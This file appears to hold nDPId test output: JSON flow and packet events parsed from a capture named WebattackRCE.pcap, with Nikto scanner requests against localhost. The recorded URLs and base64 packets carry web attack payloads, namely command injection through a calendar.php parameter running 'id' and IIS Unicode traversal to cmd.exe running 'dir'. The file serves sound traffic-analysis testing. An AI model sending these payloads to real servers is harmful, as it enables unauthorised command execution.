01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumz\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7580000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_packet_id":1,"flow_last_seen":1576420277857,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1576420277857,"pkt":"AAAAAAAAAAAAAAAACABFAAEsZgtAAEAG1b5\/AAABfwAAAcc8H5AWK18ypPoEwIAYAED\/IAAAAQEICp1m\/4mdZv+JR0VUIC9odGZvcnVtL2NhbGVuZGFyLnBocD9jYWxiaXJ0aGRheXM9MSZhY3Rpb249Z2V0ZGF5JmRheT0yMDAxLTgtMTUmY29tbWE9JTIyO2VjaG8lMjAnJzslMjBlY2hvJTIwJTYwaWQlMjAlNjA7ZGllKCk7ZWNobyUyMiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7580000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htforum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_packet_id":1,"flow_last_seen":1576420277858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"thread_ts_msec":1576420277858,"pkt":"AAAAAAAAAAAAAAAACABFAAEqtcxAAEAGhf9\/AAABfwAAAcc+H5DIWozz4BLqQYAYAED\/HgAAAQEICp1m\/4qdZv+KR0VUIC9ib2FyZC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/board\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_packet_id":1,"flow_last_seen":1576420277860,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"thread_ts_msec":1576420277860,"pkt":"AAAAAAAAAAAAAAAACABFAAEumzdAAEAGoJB\/AAABfwAAAcdAH5B97qINvJ0VaoAYAED\/IgAAAQEICp1m\/4ydZv+MR0VUIC9jb21tdW5pdHkvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/community\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7580000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00804{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_packet_id":1,"flow_last_seen":1576420277861,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":309,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":309,"pkt_l4_len":275,"thread_ts_msec":1576420277861,"pkt":"AAAAAAAAAAAAAAAACABFAAEntyFAAEAGhK1\/AAABfwAAAcdCH5DLAI4n0VAE+IAYAED\/GwAAAQEICp1m\/42dZv+NR0VUIC92Yi9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7580000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_packet_id":1,"flow_last_seen":1576420277863,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"thread_ts_msec":1576420277863,"pkt":"AAAAAAAAAAAAAAAACABFAAEuCCBAAEAGM6h\/AAABfwAAAcdEH5ADaDEo9nQ1BIAYAED\/IgAAAQEICp1m\/4+dZv+PR0VUIC92YnVsbGV0aW4vY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_packet_id":1,"flow_last_seen":1576420277864,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277864,"pkt":"AAAAAAAAAAAAAAAACABFAADJt5hAAEAGhJR\/AAABfwAAAcdGH5CwLY6th0R7wIAYAED+vQAAAQEICp1m\/5CdZv+QR0VUIC9fdnRpX2Jpbi9mcGNvdW50LmV4ZSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDg5KQ0KDQo="}
01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/fpcount.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003089)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_packet_id":1,"flow_last_seen":1576420277866,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277866,"pkt":"AAAAAAAAAAAAAAAACABFAADHtYVAAEAGhql\/AAABfwAAAcdIH5CyuYy6IN3YVoAYAED+uwAAAQEICp1m\/5KdZv+SR0VUIC9zaXRlL2VnL3NvdXJjZS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxMjYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site\/eg\/source.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003126)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_packet_id":1,"flow_last_seen":1576420277867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277867,"pkt":"AAAAAAAAAAAAAAAACABFAADlWiBAAEAG4fB\/AAABfwAAAcdKH5CvgWMmQVkzqIAYAED+2QAAAQEICp1m\/5OdZv+TR0VUIC9jZXJ0c3J2Ly4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01096{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003190)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_packet_id":1,"flow_last_seen":1576420277870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1576420277870,"pkt":"AAAAAAAAAAAAAAAACABFAADwKqRAAEAGEWJ\/AAABfwAAAcdMH5CrChOaUJIGgIAYAED+5AAAAQEICp1m\/5adZv+WR0VUIC9jZ2ktYmluLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01108{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003191)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_packet_id":1,"flow_last_seen":1576420277871,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1576420277871,"pkt":"AAAAAAAAAAAAAAAACABFAADnEqJAAEAGKW1\/AAABfwAAAcdOH5CE7yudGG3JzIAYAED+2wAAAQEICp1m\/5edZv+XR0VUIC9paXNhZG1wd2QvLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMTkyKQ0KDQo="}
